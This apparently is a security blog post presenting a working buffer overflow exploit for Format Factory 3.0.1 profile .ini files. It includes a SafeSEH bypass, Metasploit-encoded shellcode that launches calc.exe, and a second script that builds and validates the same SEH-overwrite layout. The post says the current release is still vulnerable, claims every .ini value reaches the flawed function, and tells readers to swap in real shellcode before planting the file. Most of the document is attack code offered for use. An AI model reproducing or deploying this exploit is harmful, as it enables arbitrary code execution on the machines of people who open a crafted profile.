Here's a working exploit for an already disclosed bug, including a SafeSEH bypass, against the current version, which is still vulnerable. Sadly.
```python
#!/usr/bin/python
# Exploit Title: Format Factory v3.0.1 Profile File Handling Buffer Overflow
# Version: <= 3.0.1
# Date: 2012-11-19
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: https://www.rcesecurity.com
# Software Link: http://www.pcfreetime.com
# Tested on: Windows XP SP3 Professional German
# Notes: -
# Howto: Copy .ini to %USERPROFILE%\My Documents\FormatFactory\PicCustom

from struct import pack

filename = "profile.ini"

junk1 = b"\xCC" * 260                  # padding up to the SEH record
nseh = b"\xeb\x06\x90\x90"             # JMP SHORT +6: hop over the 4-byte handler pointer
eip = pack('<L', 0x024C1923)           # CALL DWORD PTR SS:[EBP-C] - SafeSEH Bypass
nops = b"\x90" * 10                    # small sled in front of the shellcode
junk2 = b"\xCC" * 10000                # filler to make sure the overflow/exception triggers

# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00'
shellcode = (
    b"\xba\x68\x3e\x85\x1f\xd9\xca\xd9\x74\x24\xf4\x58\x29\xc9"
    b"\xb1\x33\x31\x50\x12\x83\xe8\xfc\x03\x38\x30\x67\xea\x44"
    b"\xa4\xee\x15\xb4\x35\x91\x9c\x51\x04\x83\xfb\x12\x35\x13"
    b"\x8f\x76\xb6\xd8\xdd\x62\x4d\xac\xc9\x85\xe6\x1b\x2c\xa8"
    b"\xf7\xad\xf0\x66\x3b\xaf\x8c\x74\x68\x0f\xac\xb7\x7d\x4e"
    b"\xe9\xa5\x8e\x02\xa2\xa2\x3d\xb3\xc7\xf6\xfd\xb2\x07\x7d"
    b"\xbd\xcc\x22\x41\x4a\x67\x2c\x91\xe3\xfc\x66\x09\x8f\x5b"
    b"\x57\x28\x5c\xb8\xab\x63\xe9\x0b\x5f\x72\x3b\x42\xa0\x45"
    b"\x03\x09\x9f\x6a\x8e\x53\xe7\x4c\x71\x26\x13\xaf\x0c\x31"
    b"\xe0\xd2\xca\xb4\xf5\x74\x98\x6f\xde\x85\x4d\xe9\x95\x89"
    b"\x3a\x7d\xf1\x8d\xbd\x52\x89\xa9\x36\x55\x5e\x38\x0c\x72"
    b"\x7a\x61\xd6\x1b\xdb\xcf\xb9\x24\x3b\xb7\x66\x81\x37\x55"
    b"\x72\xb3\x15\x33\x85\x31\x20\x7a\x85\x49\x2b\x2c\xee\x78"
    b"\xa0\xa3\x69\x85\x63\x80\x86\xcf\x2e\xa0\x0e\x96\xba\xf1"
    b"\x52\x29\x11\x35\x6b\xaa\x90\xc5\x88\xb2\xd0\xc0\xd5\x74"
    b"\x08\xb8\x46\x11\x2e\x6f\x66\x30\x4d\xee\xf4\xd8\xbc\x95"
    b"\x7c\x7a\xc1"
)

# Overlong value for the "Type" key: padding, nSEH, SEH, sled, shellcode, filler
poc = b"Type=" + junk1 + nseh + eip + nops + shellcode + junk2

try:
    print("[*] Creating exploit file...\n")
    with open(filename, "wb") as writeFile:
        writeFile.write(poc)
    print("[*] File successfully created!")
except IOError:
    print("[!] Error while creating file!")
```
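The exploit above hard-codes its layout, so a mistake in the offset or in the short jump only shows up when the debugger lands somewhere unexpected. The following is an added example, not the exploit from this post and not code from Format Factory: it builds the same SEH-overwrite layout (padding, nSEH with `jmp short +6`, SEH pointing at the `CALL DWORD PTR SS:[EBP-C]` address, nop sled, shellcode, filler) from named constants, parses the records back out to confirm the jump really clears the 4-byte handler pointer, and scans the result for bytes that would cut the value short. The offset 260 and the handler address 0x024C1923 are taken from the exploit; the null byte is the one character msfencode was told to avoid; treating CR and LF as bad bytes for a line-based .ini reader is an assumption, as is the `key` parameter, which is only there because every .ini value is handled by the same function.

```python
from struct import pack, unpack

# Added example (not the page's exploit): build and sanity-check the SEH-overwrite
# layout used above before anything is written to disk.
#
#   key=[padding][nSEH: jmp short +6, 2 nops][SEH: handler address][nop sled][shellcode][filler]
#
# Offsets and the handler address come from the exploit on this page; the byte
# constraints below are assumptions about how the .ini value is read.
SEH_OFFSET = 260             # bytes of value before the nSEH record is overwritten
HANDLER_ADDR = 0x024C1923    # CALL DWORD PTR SS:[EBP-C], the SafeSEH bypass address from the page
BAD_CHARS = b"\x00"          # terminates a C string; msfencode was run with -b '\x00'
INI_BREAKS = b"\r\n"         # assumption: a line-based .ini reader would also cut the value here


def short_jmp(rel8):
    """Two-byte `jmp short`; rel8 is counted from the end of the instruction."""
    if not -128 <= rel8 <= 127:
        raise ValueError("rel8 must fit in a signed byte")
    return b"\xeb" + pack("<b", rel8)


def build_value(shellcode, offset=SEH_OFFSET, handler_addr=HANDLER_ADDR,
                nop_len=10, filler_len=10000):
    """Value part of the overlong key: padding, nSEH/SEH records, sled, shellcode, filler."""
    nseh = short_jmp(6) + b"\x90\x90"      # lands 8 bytes past nSEH, i.e. right after SEH
    seh = pack("<L", handler_addr)         # little-endian pointer; must contain no bad byte
    return (b"\xcc" * offset + nseh + seh
            + b"\x90" * nop_len + shellcode + b"\xcc" * filler_len)


def build_profile_line(shellcode, key=b"Type", **kw):
    """One .ini line `key=value`; any key can be used since every value hits the same code."""
    return key + b"=" + build_value(shellcode, **kw)


def find_bad_bytes(data, bad=BAD_CHARS + INI_BREAKS):
    """(offset, byte) pairs for bytes that would truncate or corrupt the value."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def seh_layout(value, offset=SEH_OFFSET):
    """Parse the nSEH/SEH records back out and check the short jump clears the handler."""
    nseh = value[offset:offset + 4]
    seh = value[offset + 4:offset + 8]
    if nseh[0:1] != b"\xeb":
        raise ValueError("nSEH does not start with jmp short")
    rel8 = unpack("<b", nseh[1:2])[0]
    target = offset + 2 + rel8             # rel8 is relative to the end of the 2-byte jmp
    return {
        "handler": unpack("<L", seh)[0],
        "jump_target": target,
        "clears_seh": target == offset + 8,  # first byte after the 4-byte handler pointer
    }


if __name__ == "__main__":
    # Constructed stand-in shellcode (int3 breakpoints), not the calc.exe payload from the post.
    line = build_profile_line(b"\xcc" * 16)
    value = line[len(b"Type="):]
    print(seh_layout(value))
    print("bad bytes:", find_bad_bytes(line))
    with open("profile.ini", "wb") as f:
        f.write(line)
```

Run it with the real shellcode in place of the int3 stand-in; if `clears_seh` is False or `find_bad_bytes` reports anything, the file is not worth copying into the PicCustom folder yet.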
An important side note: the bug has not been properly researched. The Bugtraq posting states:
Vulnerable Module(s): [+] INI - Width & Height - Size & Buffer Validation
But every other .ini value is vulnerable too. A closer look at the disassembly clearly shows it: the vulnerable function is called on every single value of the .ini file: